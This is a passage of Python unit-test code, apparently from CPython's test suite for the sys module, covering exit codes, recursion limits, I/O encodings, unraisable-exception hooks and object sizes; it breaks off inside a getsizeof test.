class SysModuleTest(unittest.TestCase): def tearDown(self): test.support.reap_children() def test_exit(self): # call with two arguments self.assertRaises(TypeError, sys.exit, 42, 42) # call without argument with self.assertRaises(SystemExit) as cm: sys.exit() self.assertIsNone(cm.exception.code) rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()') self.assertEqual(rc, 0) self.assertEqual(out, b'') self.assertEqual(err, b'') # call with integer argument with self.assertRaises(SystemExit) as cm: sys.exit(42) self.assertEqual(cm.exception.code, 42) # call with tuple argument with one entry # entry will be unpacked with self.assertRaises(SystemExit) as cm: sys.exit((42,)) self.assertEqual(cm.exception.code, 42) # call with string argument with self.assertRaises(SystemExit) as cm: sys.exit("exit") self.assertEqual(cm.exception.code, "exit") # call with tuple argument with two entries with self.assertRaises(SystemExit) as cm: sys.exit((17, 23)) self.assertEqual(cm.exception.code, (17, 23)) # test that the exit machinery handles SystemExits properly rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)') self.assertEqual(rc, 47) self.assertEqual(out, b'') self.assertEqual(err, b'') def check_exit_message(code, expected, **env_vars): rc, out, err = assert_python_failure('-c', code, **env_vars) self.assertEqual(rc, 1) self.assertEqual(out, b'') self.assertTrue(err.startswith(expected), "%s doesn't start with %s" % (ascii(err), ascii(expected))) # test that stderr buffer is flushed before the exit message is written # into stderr check_exit_message( r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")', b"unflushed,message") # test that the exit message is written with backslashreplace error # handler to stderr check_exit_message( r'import sys; sys.exit("surrogates:\uDCFF")', b"surrogates:\\udcff") # test that the unicode message is encoded to the stderr encoding # instead of the default encoding (utf8) check_exit_message( r'import sys; sys.exit("h\xe9")', b"h\xe9", PYTHONIOENCODING='latin-1') def test_getdefaultencoding(self): self.assertRaises(TypeError, sys.getdefaultencoding, 42) # can't check more than the type, as the user might have changed it self.assertIsInstance(sys.getdefaultencoding(), str) # testing sys.settrace() is done in test_sys_settrace.py # testing sys.setprofile() is done in test_sys_setprofile.py def test_switchinterval(self): self.assertRaises(TypeError, sys.setswitchinterval) self.assertRaises(TypeError, sys.setswitchinterval, "a") self.assertRaises(ValueError, sys.setswitchinterval, -1.0) self.assertRaises(ValueError, sys.setswitchinterval, 0.0) orig = sys.getswitchinterval() # sanity check self.assertTrue(orig < 0.5, orig) try: for n in 0.00001, 0.05, 3.0, orig: sys.setswitchinterval(n) self.assertAlmostEqual(sys.getswitchinterval(), n) finally: sys.setswitchinterval(orig) def test_recursionlimit(self): self.assertRaises(TypeError, sys.getrecursionlimit, 42) oldlimit = sys.getrecursionlimit() self.assertRaises(TypeError, sys.setrecursionlimit) self.assertRaises(ValueError, sys.setrecursionlimit, -42) sys.setrecursionlimit(10000) self.assertEqual(sys.getrecursionlimit(), 10000) sys.setrecursionlimit(oldlimit) def test_recursionlimit_recovery(self): if hasattr(sys, 'gettrace') and sys.gettrace(): self.skipTest('fatal error if run with a trace function') oldlimit = sys.getrecursionlimit() def f(): f() try: for depth in (50, 75, 100, 250, 1000): try: sys.setrecursionlimit(depth) except RecursionError: # Issue #25274: The recursion limit is too 
low at the # current recursion depth continue # Issue #5392: test stack overflow after hitting recursion # limit twice with self.assertRaises(RecursionError): f() with self.assertRaises(RecursionError): f() finally: sys.setrecursionlimit(oldlimit) @test.support.cpython_only def test_setrecursionlimit_recursion_depth(self): # Issue #25274: Setting a low recursion limit must be blocked if the # current recursion depth is already higher than limit. from _testinternalcapi import get_recursion_depth def set_recursion_limit_at_depth(depth, limit): recursion_depth = get_recursion_depth() if recursion_depth >= depth: with self.assertRaises(RecursionError) as cm: sys.setrecursionlimit(limit) self.assertRegex(str(cm.exception), "cannot set the recursion limit to [0-9]+ " "at the recursion depth [0-9]+: " "the limit is too low") else: set_recursion_limit_at_depth(depth, limit) oldlimit = sys.getrecursionlimit() try: sys.setrecursionlimit(1000) for limit in (10, 25, 50, 75, 100, 150, 200): set_recursion_limit_at_depth(limit, limit) finally: sys.setrecursionlimit(oldlimit) def test_getwindowsversion(self): # Raise SkipTest if sys doesn't have getwindowsversion attribute test.support.get_attribute(sys, "getwindowsversion") v = sys.getwindowsversion() self.assertEqual(len(v), 5) self.assertIsInstance(v[0], int) self.assertIsInstance(v[1], int) self.assertIsInstance(v[2], int) self.assertIsInstance(v[3], int) self.assertIsInstance(v[4], str) self.assertRaises(IndexError, operator.getitem, v, 5) self.assertIsInstance(v.major, int) self.assertIsInstance(v.minor, int) self.assertIsInstance(v.build, int) self.assertIsInstance(v.platform, int) self.assertIsInstance(v.service_pack, str) self.assertIsInstance(v.service_pack_minor, int) self.assertIsInstance(v.service_pack_major, int) self.assertIsInstance(v.suite_mask, int) self.assertIsInstance(v.product_type, int) self.assertEqual(v[0], v.major) self.assertEqual(v[1], v.minor) self.assertEqual(v[2], v.build) self.assertEqual(v[3], v.platform) self.assertEqual(v[4], v.service_pack) # This is how platform.py calls it. Make sure tuple # still has 5 elements maj, min, buildno, plat, csd = sys.getwindowsversion() def test_call_tracing(self): self.assertRaises(TypeError, sys.call_tracing, type, 2) @unittest.skipUnless(hasattr(sys, "setdlopenflags"), 'test needs sys.setdlopenflags()') def test_dlopenflags(self): self.assertTrue(hasattr(sys, "getdlopenflags")) self.assertRaises(TypeError, sys.getdlopenflags, 42) oldflags = sys.getdlopenflags() self.assertRaises(TypeError, sys.setdlopenflags) sys.setdlopenflags(oldflags+1) self.assertEqual(sys.getdlopenflags(), oldflags+1) sys.setdlopenflags(oldflags) @test.support.refcount_test def test_refcount(self): # n here must be a global in order for this test to pass while # tracing with a python function. Tracing calls PyFrame_FastToLocals # which will add a copy of any locals to the frame object, causing # the reference count to increase by 2 instead of 1. global n self.assertRaises(TypeError, sys.getrefcount) c = sys.getrefcount(None) n = None self.assertEqual(sys.getrefcount(None), c+1) del n self.assertEqual(sys.getrefcount(None), c) if hasattr(sys, "gettotalrefcount"): self.assertIsInstance(sys.gettotalrefcount(), int) def test_getframe(self): self.assertRaises(TypeError, sys._getframe, 42, 42) self.assertRaises(ValueError, sys._getframe, 2000000000) self.assertTrue( SysModuleTest.test_getframe.__code__ \ is sys._getframe().f_code ) # sys._current_frames() is a CPython-only gimmick. 
@threading_helper.reap_threads def test_current_frames(self): import threading import traceback # Spawn a thread that blocks at a known place. Then the main # thread does sys._current_frames(), and verifies that the frames # returned make sense. entered_g = threading.Event() leave_g = threading.Event() thread_info = [] # the thread's id def f123(): g456() def g456(): thread_info.append(threading.get_ident()) entered_g.set() leave_g.wait() t = threading.Thread(target=f123) t.start() entered_g.wait() # At this point, t has finished its entered_g.set(), although it's # impossible to guess whether it's still on that line or has moved on # to its leave_g.wait(). self.assertEqual(len(thread_info), 1) thread_id = thread_info[0] d = sys._current_frames() for tid in d: self.assertIsInstance(tid, int) self.assertGreater(tid, 0) main_id = threading.get_ident() self.assertIn(main_id, d) self.assertIn(thread_id, d) # Verify that the captured main-thread frame is _this_ frame. frame = d.pop(main_id) self.assertTrue(frame is sys._getframe()) # Verify that the captured thread frame is blocked in g456, called # from f123. This is a little tricky, since various bits of # threading.py are also in the thread's call stack. frame = d.pop(thread_id) stack = traceback.extract_stack(frame) for i, (filename, lineno, funcname, sourceline) in enumerate(stack): if funcname == "f123": break else: self.fail("didn't find f123() on thread's call stack") self.assertEqual(sourceline, "g456()") # And the next record must be for g456(). filename, lineno, funcname, sourceline = stack[i+1] self.assertEqual(funcname, "g456") self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"]) # Reap the spawned thread. leave_g.set() t.join() @threading_helper.reap_threads def test_current_exceptions(self): import threading import traceback # Spawn a thread that blocks at a known place. Then the main # thread does sys._current_frames(), and verifies that the frames # returned make sense. entered_g = threading.Event() leave_g = threading.Event() thread_info = [] # the thread's id def f123(): g456() def g456(): thread_info.append(threading.get_ident()) entered_g.set() while True: try: raise ValueError("oops") except ValueError: if leave_g.wait(timeout=support.LONG_TIMEOUT): break t = threading.Thread(target=f123) t.start() entered_g.wait() # At this point, t has finished its entered_g.set(), although it's # impossible to guess whether it's still on that line or has moved on # to its leave_g.wait(). self.assertEqual(len(thread_info), 1) thread_id = thread_info[0] d = sys._current_exceptions() for tid in d: self.assertIsInstance(tid, int) self.assertGreater(tid, 0) main_id = threading.get_ident() self.assertIn(main_id, d) self.assertIn(thread_id, d) self.assertEqual((None, None, None), d.pop(main_id)) # Verify that the captured thread frame is blocked in g456, called # from f123. This is a little tricky, since various bits of # threading.py are also in the thread's call stack. exc_type, exc_value, exc_tb = d.pop(thread_id) stack = traceback.extract_stack(exc_tb.tb_frame) for i, (filename, lineno, funcname, sourceline) in enumerate(stack): if funcname == "f123": break else: self.fail("didn't find f123() on thread's call stack") self.assertEqual(sourceline, "g456()") # And the next record must be for g456(). filename, lineno, funcname, sourceline = stack[i+1] self.assertEqual(funcname, "g456") self.assertTrue(sourceline.startswith("if leave_g.wait(")) # Reap the spawned thread. 
leave_g.set() t.join() def test_attributes(self): self.assertIsInstance(sys.api_version, int) self.assertIsInstance(sys.argv, list) for arg in sys.argv: self.assertIsInstance(arg, str) self.assertIsInstance(sys.orig_argv, list) for arg in sys.orig_argv: self.assertIsInstance(arg, str) self.assertIn(sys.byteorder, ("little", "big")) self.assertIsInstance(sys.builtin_module_names, tuple) self.assertIsInstance(sys.copyright, str) self.assertIsInstance(sys.exec_prefix, str) self.assertIsInstance(sys.base_exec_prefix, str) self.assertIsInstance(sys.executable, str) self.assertEqual(len(sys.float_info), 11) self.assertEqual(sys.float_info.radix, 2) self.assertEqual(len(sys.int_info), 2) self.assertTrue(sys.int_info.bits_per_digit % 5 == 0) self.assertTrue(sys.int_info.sizeof_digit >= 1) self.assertEqual(type(sys.int_info.bits_per_digit), int) self.assertEqual(type(sys.int_info.sizeof_digit), int) self.assertIsInstance(sys.hexversion, int) self.assertEqual(len(sys.hash_info), 9) self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width) # sys.hash_info.modulus should be a prime; we do a quick # probable primality test (doesn't exclude the possibility of # a Carmichael number) for x in range(1, 100): self.assertEqual( pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus), 1, "sys.hash_info.modulus {} is a non-prime".format( sys.hash_info.modulus) ) self.assertIsInstance(sys.hash_info.inf, int) self.assertIsInstance(sys.hash_info.nan, int) self.assertIsInstance(sys.hash_info.imag, int) algo = sysconfig.get_config_var("Py_HASH_ALGORITHM") if sys.hash_info.algorithm in {"fnv", "siphash24"}: self.assertIn(sys.hash_info.hash_bits, {32, 64}) self.assertIn(sys.hash_info.seed_bits, {32, 64, 128}) if algo == 1: self.assertEqual(sys.hash_info.algorithm, "siphash24") elif algo == 2: self.assertEqual(sys.hash_info.algorithm, "fnv") else: self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"}) else: # PY_HASH_EXTERNAL self.assertEqual(algo, 0) self.assertGreaterEqual(sys.hash_info.cutoff, 0) self.assertLess(sys.hash_info.cutoff, 8) self.assertIsInstance(sys.maxsize, int) self.assertIsInstance(sys.maxunicode, int) self.assertEqual(sys.maxunicode, 0x10FFFF) self.assertIsInstance(sys.platform, str) self.assertIsInstance(sys.prefix, str) self.assertIsInstance(sys.base_prefix, str) self.assertIsInstance(sys.platlibdir, str) self.assertIsInstance(sys.version, str) vi = sys.version_info self.assertIsInstance(vi[:], tuple) self.assertEqual(len(vi), 5) self.assertIsInstance(vi[0], int) self.assertIsInstance(vi[1], int) self.assertIsInstance(vi[2], int) self.assertIn(vi[3], ("alpha", "beta", "candidate", "final")) self.assertIsInstance(vi[4], int) self.assertIsInstance(vi.major, int) self.assertIsInstance(vi.minor, int) self.assertIsInstance(vi.micro, int) self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final")) self.assertIsInstance(vi.serial, int) self.assertEqual(vi[0], vi.major) self.assertEqual(vi[1], vi.minor) self.assertEqual(vi[2], vi.micro) self.assertEqual(vi[3], vi.releaselevel) self.assertEqual(vi[4], vi.serial) self.assertTrue(vi > (1,0,0)) self.assertIsInstance(sys.float_repr_style, str) self.assertIn(sys.float_repr_style, ('short', 'legacy')) if not sys.platform.startswith('win'): self.assertIsInstance(sys.abiflags, str) def test_thread_info(self): info = sys.thread_info self.assertEqual(len(info), 3) self.assertIn(info.name, ('nt', 'pthread', 'solaris', None)) self.assertIn(info.lock, ('semaphore', 'mutex+cond', None)) def test_43581(self): # Can't use sys.stdout, as this is a 
StringIO object when # the test runs under regrtest. self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding) def test_intern(self): global INTERN_NUMRUNS INTERN_NUMRUNS += 1 self.assertRaises(TypeError, sys.intern) s = "never interned before" + str(INTERN_NUMRUNS) self.assertTrue(sys.intern(s) is s) s2 = s.swapcase().swapcase() self.assertTrue(sys.intern(s2) is s) # Subclasses of string can't be interned, because they # provide too much opportunity for insane things to happen. # We don't want them in the interned dict and if they aren't # actually interned, we don't want to create the appearance # that they are by allowing intern() to succeed. class S(str): def __hash__(self): return 123 self.assertRaises(TypeError, sys.intern, S("abc")) def test_sys_flags(self): self.assertTrue(sys.flags) attrs = ("debug", "inspect", "interactive", "optimize", "dont_write_bytecode", "no_user_site", "no_site", "ignore_environment", "verbose", "bytes_warning", "quiet", "hash_randomization", "isolated", "dev_mode", "utf8_mode", "warn_default_encoding") for attr in attrs: self.assertTrue(hasattr(sys.flags, attr), attr) attr_type = bool if attr == "dev_mode" else int self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr) self.assertTrue(repr(sys.flags)) self.assertEqual(len(sys.flags), len(attrs)) self.assertIn(sys.flags.utf8_mode, {0, 1, 2}) def assert_raise_on_new_sys_type(self, sys_attr): # Users are intentionally prevented from creating new instances of # sys.flags, sys.version_info, and sys.getwindowsversion. arg = sys_attr attr_type = type(sys_attr) with self.assertRaises(TypeError): attr_type(arg) with self.assertRaises(TypeError): attr_type.__new__(attr_type, arg) def test_sys_flags_no_instantiation(self): self.assert_raise_on_new_sys_type(sys.flags) def test_sys_version_info_no_instantiation(self): self.assert_raise_on_new_sys_type(sys.version_info) def test_sys_getwindowsversion_no_instantiation(self): # Skip if not being run on Windows. test.support.get_attribute(sys, "getwindowsversion") self.assert_raise_on_new_sys_type(sys.getwindowsversion()) @test.support.cpython_only def test_clear_type_cache(self): sys._clear_type_cache() def test_ioencoding(self): env = dict(os.environ) # Test character: cent sign, encoded as 0x4A (ASCII J) in CP424, # not representable in ASCII. 
env["PYTHONIOENCODING"] = "cp424" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout = subprocess.PIPE, env=env) out = p.communicate()[0].strip() expected = ("\xa2" + os.linesep).encode("cp424") self.assertEqual(out, expected) env["PYTHONIOENCODING"] = "ascii:replace" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout = subprocess.PIPE, env=env) out = p.communicate()[0].strip() self.assertEqual(out, b'?') env["PYTHONIOENCODING"] = "ascii" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) out, err = p.communicate() self.assertEqual(out, b'') self.assertIn(b'UnicodeEncodeError:', err) self.assertIn(rb"'\xa2'", err) env["PYTHONIOENCODING"] = "ascii:" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) out, err = p.communicate() self.assertEqual(out, b'') self.assertIn(b'UnicodeEncodeError:', err) self.assertIn(rb"'\xa2'", err) env["PYTHONIOENCODING"] = ":surrogateescape" p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'], stdout=subprocess.PIPE, env=env) out = p.communicate()[0].strip() self.assertEqual(out, b'\xbd') @unittest.skipUnless(os_helper.FS_NONASCII, 'requires OS support of non-ASCII encodings') @unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False), 'requires FS encoding to match locale') def test_ioencoding_nonascii(self): env = dict(os.environ) env["PYTHONIOENCODING"] = "" p = subprocess.Popen([sys.executable, "-c", 'print(%a)' % os_helper.FS_NONASCII], stdout=subprocess.PIPE, env=env) out = p.communicate()[0].strip() self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII)) @unittest.skipIf(sys.base_prefix != sys.prefix, 'Test is not venv-compatible') def test_executable(self): # sys.executable should be absolute self.assertEqual(os.path.abspath(sys.executable), sys.executable) # Issue #7774: Ensure that sys.executable is an empty string if argv[0] # has been set to a non existent program name and Python is unable to # retrieve the real program name # For a normal installation, it should work without 'cwd' # argument. For test runs in the build directory, see #7774. 
python_dir = os.path.dirname(os.path.realpath(sys.executable)) p = subprocess.Popen( ["nonexistent", "-c", 'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'], executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir) stdout = p.communicate()[0] executable = stdout.strip().decode("ASCII") p.wait() self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))]) def check_fsencoding(self, fs_encoding, expected=None): self.assertIsNotNone(fs_encoding) codecs.lookup(fs_encoding) if expected: self.assertEqual(fs_encoding, expected) def test_getfilesystemencoding(self): fs_encoding = sys.getfilesystemencoding() if sys.platform == 'darwin': expected = 'utf-8' else: expected = None self.check_fsencoding(fs_encoding, expected) def c_locale_get_error_handler(self, locale, isolated=False, encoding=None): # Force the POSIX locale env = os.environ.copy() env["LC_ALL"] = locale env["PYTHONCOERCECLOCALE"] = "0" code = '\n'.join(( 'import sys', 'def dump(name):', ' std = getattr(sys, name)', ' print("%s: %s" % (name, std.errors))', 'dump("stdin")', 'dump("stdout")', 'dump("stderr")', )) args = [sys.executable, "-X", "utf8=0", "-c", code] if isolated: args.append("-I") if encoding is not None: env['PYTHONIOENCODING'] = encoding else: env.pop('PYTHONIOENCODING', None) p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True) stdout, stderr = p.communicate() return stdout def check_locale_surrogateescape(self, locale): out = self.c_locale_get_error_handler(locale, isolated=True) self.assertEqual(out, 'stdin: surrogateescape\n' 'stdout: surrogateescape\n' 'stderr: backslashreplace\n') # replace the default error handler out = self.c_locale_get_error_handler(locale, encoding=':ignore') self.assertEqual(out, 'stdin: ignore\n' 'stdout: ignore\n' 'stderr: backslashreplace\n') # force the encoding out = self.c_locale_get_error_handler(locale, encoding='iso8859-1') self.assertEqual(out, 'stdin: strict\n' 'stdout: strict\n' 'stderr: backslashreplace\n') out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:') self.assertEqual(out, 'stdin: strict\n' 'stdout: strict\n' 'stderr: backslashreplace\n') # have no any effect out = self.c_locale_get_error_handler(locale, encoding=':') self.assertEqual(out, 'stdin: surrogateescape\n' 'stdout: surrogateescape\n' 'stderr: backslashreplace\n') out = self.c_locale_get_error_handler(locale, encoding='') self.assertEqual(out, 'stdin: surrogateescape\n' 'stdout: surrogateescape\n' 'stderr: backslashreplace\n') def test_c_locale_surrogateescape(self): self.check_locale_surrogateescape('C') def test_posix_locale_surrogateescape(self): self.check_locale_surrogateescape('POSIX') def test_implementation(self): # This test applies to all implementations equally. levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF} self.assertTrue(hasattr(sys.implementation, 'name')) self.assertTrue(hasattr(sys.implementation, 'version')) self.assertTrue(hasattr(sys.implementation, 'hexversion')) self.assertTrue(hasattr(sys.implementation, 'cache_tag')) version = sys.implementation.version self.assertEqual(version[:2], (version.major, version.minor)) hexversion = (version.major << 24 | version.minor << 16 | version.micro << 8 | levels[version.releaselevel] << 4 | version.serial << 0) self.assertEqual(sys.implementation.hexversion, hexversion) # PEP 421 requires that .name be lower case. 
self.assertEqual(sys.implementation.name, sys.implementation.name.lower()) @test.support.cpython_only def test_debugmallocstats(self): # Test sys._debugmallocstats() from test.support.script_helper import assert_python_ok args = ['-c', 'import sys; sys._debugmallocstats()'] ret, out, err = assert_python_ok(*args) self.assertIn(b"free PyDictObjects", err) # The function has no parameter self.assertRaises(TypeError, sys._debugmallocstats, True) @unittest.skipUnless(hasattr(sys, "getallocatedblocks"), "sys.getallocatedblocks unavailable on this build") def test_getallocatedblocks(self): try: import _testcapi except ImportError: with_pymalloc = support.with_pymalloc() else: try: alloc_name = _testcapi.pymem_getallocatorsname() except RuntimeError as exc: # "cannot get allocators name" (ex: tracemalloc is used) with_pymalloc = True else: with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug')) # Some sanity checks a = sys.getallocatedblocks() self.assertIs(type(a), int) if with_pymalloc: self.assertGreater(a, 0) else: # When WITH_PYMALLOC isn't available, we don't know anything # about the underlying implementation: the function might # return 0 or something greater. self.assertGreaterEqual(a, 0) try: # While we could imagine a Python session where the number of # multiple buffer objects would exceed the sharing of references, # it is unlikely to happen in a normal test run. self.assertLess(a, sys.gettotalrefcount()) except AttributeError: # gettotalrefcount() not available pass gc.collect() b = sys.getallocatedblocks() self.assertLessEqual(b, a) gc.collect() c = sys.getallocatedblocks() self.assertIn(c, range(b - 50, b + 50)) def test_is_finalizing(self): self.assertIs(sys.is_finalizing(), False) # Don't use the atexit module because _Py_Finalizing is only set # after calling atexit callbacks code = """if 1: import sys class AtExit: is_finalizing = sys.is_finalizing print = print def __del__(self): self.print(self.is_finalizing(), flush=True) # Keep a reference in the __main__ module namespace, so the # AtExit destructor will be called at Python exit ref = AtExit() """ rc, stdout, stderr = assert_python_ok('-c', code) self.assertEqual(stdout.rstrip(), b'True') def test_issue20602(self): # sys.flags and sys.float_info were wiped during shutdown. 
code = """if 1: import sys class A: def __del__(self, sys=sys): print(sys.flags) print(sys.float_info) a = A() """ rc, out, err = assert_python_ok('-c', code) out = out.splitlines() self.assertIn(b'sys.flags', out[0]) self.assertIn(b'sys.float_info', out[1]) def test_sys_ignores_cleaning_up_user_data(self): code = """if 1: import struct, sys class C: def __init__(self): self.pack = struct.pack def __del__(self): self.pack('I', -42) sys.x = C() """ rc, stdout, stderr = assert_python_ok('-c', code) self.assertEqual(rc, 0) self.assertEqual(stdout.rstrip(), b"") self.assertEqual(stderr.rstrip(), b"") @unittest.skipUnless(hasattr(sys, 'getandroidapilevel'), 'need sys.getandroidapilevel()') def test_getandroidapilevel(self): level = sys.getandroidapilevel() self.assertIsInstance(level, int) self.assertGreater(level, 0) def test_sys_tracebacklimit(self): code = """if 1: import sys def f1(): 1 / 0 def f2(): f1() sys.tracebacklimit = %r f2() """ def check(tracebacklimit, expected): p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit], stderr=subprocess.PIPE) out = p.communicate()[1] self.assertEqual(out.splitlines(), expected) traceback = [ b'Traceback (most recent call last):', b' File "<string>", line 8, in <module>', b' File "<string>", line 6, in f2', b' File "<string>", line 4, in f1', b'ZeroDivisionError: division by zero' ] check(10, traceback) check(3, traceback) check(2, traceback[:1] + traceback[2:]) check(1, traceback[:1] + traceback[3:]) check(0, [traceback[-1]]) check(-1, [traceback[-1]]) check(1<<1000, traceback) check(-1<<1000, [traceback[-1]]) check(None, traceback) def test_no_duplicates_in_meta_path(self): self.assertEqual(len(sys.meta_path), len(set(sys.meta_path))) @unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"), 'needs sys._enablelegacywindowsfsencoding()') def test__enablelegacywindowsfsencoding(self): code = ('import sys', 'sys._enablelegacywindowsfsencoding()', 'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())') rc, out, err = assert_python_ok('-c', '; '.join(code)) out = out.decode('ascii', 'replace').rstrip() self.assertEqual(out, 'mbcs replace') def test_orig_argv(self): code = textwrap.dedent(''' import sys print(sys.argv) print(sys.orig_argv) ''') args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg'] proc = subprocess.run(args, check=True, capture_output=True, text=True) expected = [ repr(['-c', 'arg']), # sys.argv repr(args), # sys.orig_argv ] self.assertEqual(proc.stdout.rstrip().splitlines(), expected, proc) def test_module_names(self): self.assertIsInstance(sys.stdlib_module_names, frozenset) for name in sys.stdlib_module_names: self.assertIsInstance(name, str) def test_stdlib_dir(self): os = import_helper.import_fresh_module('os') marker = getattr(os, '__file__', None) if marker and not os.path.exists(marker): marker = None expected = os.path.dirname(marker) if marker else None self.assertEqual(os.path.normpath(sys._stdlib_dir), os.path.normpath(expected)) @test.support.cpython_only class UnraisableHookTest(unittest.TestCase): def write_unraisable_exc(self, exc, err_msg, obj): import _testcapi import types err_msg2 = f"Exception ignored {err_msg}" try: _testcapi.write_unraisable_exc(exc, err_msg, obj) return types.SimpleNamespace(exc_type=type(exc), exc_value=exc, exc_traceback=exc.__traceback__, err_msg=err_msg2, object=obj) finally: # Explicitly break any reference cycle exc = None def test_original_unraisablehook(self): for err_msg in (None, "original hook"): with self.subTest(err_msg=err_msg): obj = 
"an object" with test.support.captured_output("stderr") as stderr: with test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): self.write_unraisable_exc(ValueError(42), err_msg, obj) err = stderr.getvalue() if err_msg is not None: self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err) else: self.assertIn(f'Exception ignored in: {obj!r}\n', err) self.assertIn('Traceback (most recent call last):\n', err) self.assertIn('ValueError: 42\n', err) def test_original_unraisablehook_err(self): # bpo-22836: PyErr_WriteUnraisable() should give sensible reports class BrokenDel: def __del__(self): exc = ValueError("del is broken") # The following line is included in the traceback report: raise exc class BrokenStrException(Exception): def __str__(self): raise Exception("str() is broken") class BrokenExceptionDel: def __del__(self): exc = BrokenStrException() # The following line is included in the traceback report: raise exc for test_class in (BrokenDel, BrokenExceptionDel): with self.subTest(test_class): obj = test_class() with test.support.captured_stderr() as stderr, \ test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): # Trigger obj.__del__() del obj report = stderr.getvalue() self.assertIn("Exception ignored", report) self.assertIn(test_class.__del__.__qualname__, report) self.assertIn("test_sys.py", report) self.assertIn("raise exc", report) if test_class is BrokenExceptionDel: self.assertIn("BrokenStrException", report) self.assertIn("<exception str() failed>", report) else: self.assertIn("ValueError", report) self.assertIn("del is broken", report) self.assertTrue(report.endswith("\n")) def test_original_unraisablehook_exception_qualname(self): # See bpo-41031, bpo-45083. # Check that the exception is printed with its qualified name # rather than just classname, and the module names appears # unless it is one of the hard-coded exclusions. 
class A: class B: class X(Exception): pass for moduleName in 'builtins', '__main__', 'some_module': with self.subTest(moduleName=moduleName): A.B.X.__module__ = moduleName with test.support.captured_stderr() as stderr, \ test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): expected = self.write_unraisable_exc( A.B.X(), "msg", "obj"); report = stderr.getvalue() self.assertIn(A.B.X.__qualname__, report) if moduleName in ['builtins', '__main__']: self.assertNotIn(moduleName + '.', report) else: self.assertIn(moduleName + '.', report) def test_original_unraisablehook_wrong_type(self): exc = ValueError(42) with test.support.swap_attr(sys, 'unraisablehook', sys.__unraisablehook__): with self.assertRaises(TypeError): sys.unraisablehook(exc) def test_custom_unraisablehook(self): hook_args = None def hook_func(args): nonlocal hook_args hook_args = args obj = object() try: with test.support.swap_attr(sys, 'unraisablehook', hook_func): expected = self.write_unraisable_exc(ValueError(42), "custom hook", obj) for attr in "exc_type exc_value exc_traceback err_msg object".split(): self.assertEqual(getattr(hook_args, attr), getattr(expected, attr), (hook_args, expected)) finally: # expected and hook_args contain an exception: break reference cycle expected = None hook_args = None def test_custom_unraisablehook_fail(self): def hook_func(*args): raise Exception("hook_func failed") with test.support.captured_output("stderr") as stderr: with test.support.swap_attr(sys, 'unraisablehook', hook_func): self.write_unraisable_exc(ValueError(42), "custom hook fail", None) err = stderr.getvalue() self.assertIn(f'Exception ignored in sys.unraisablehook: ' f'{hook_func!r}\n', err) self.assertIn('Traceback (most recent call last):\n', err) self.assertIn('Exception: hook_func failed\n', err) @test.support.cpython_only class SizeofTest(unittest.TestCase): def setUp(self): self.P = struct.calcsize('P') self.longdigit = sys.int_info.sizeof_digit import _testinternalcapi self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD check_sizeof = test.support.check_sizeof def test_gc_head_size(self): # Check that the gc header size is added to objects tracked by the gc. 
vsize = test.support.calcvobjsize gc_header_size = self.gc_headsize # bool objects are not gc tracked self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit) # but lists are self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size) def test_errors(self): class BadSizeof: def __sizeof__(self): raise ValueError self.assertRaises(ValueError, sys.getsizeof, BadSizeof()) class InvalidSizeof: def __sizeof__(self): return None self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof()) sentinel = ["sentinel"] self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel) class FloatSizeof: def __sizeof__(self): return 4.5 self.assertRaises(TypeError, sys.getsizeof, FloatSizeof()) self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel) class OverflowSizeof(int): def __sizeof__(self): return int(self) self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)), sys.maxsize + self.gc_headsize) with self.assertRaises(OverflowError): sys.getsizeof(OverflowSizeof(sys.maxsize + 1)) with self.assertRaises(ValueError): sys.getsizeof(OverflowSizeof(-1)) with self.assertRaises((ValueError, OverflowError)): sys.getsizeof(OverflowSizeof(-sys.maxsize - 1)) def test_default(self): size = test.support.calcvobjsize self.assertEqual(sys.getsizeof(True), size('') + self.longdigit) self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit) def test_objecttypes(self): # check all types defined in Objects/ calcsize = struct.calcsize size = test.support.calcobjsize vsize = test.support.calcvobjsize check = self.check_sizeof # bool check(True, vsize('') + self.longdigit) # buffer # XXX # builtin_function_or_method check(len, size('5P')) # bytearray samples = [b'', b'u'*100000] for sample in samples: x = bytearray(sample) check(x, vsize('n2Pi') + x.__alloc__()) # bytearray_iterator 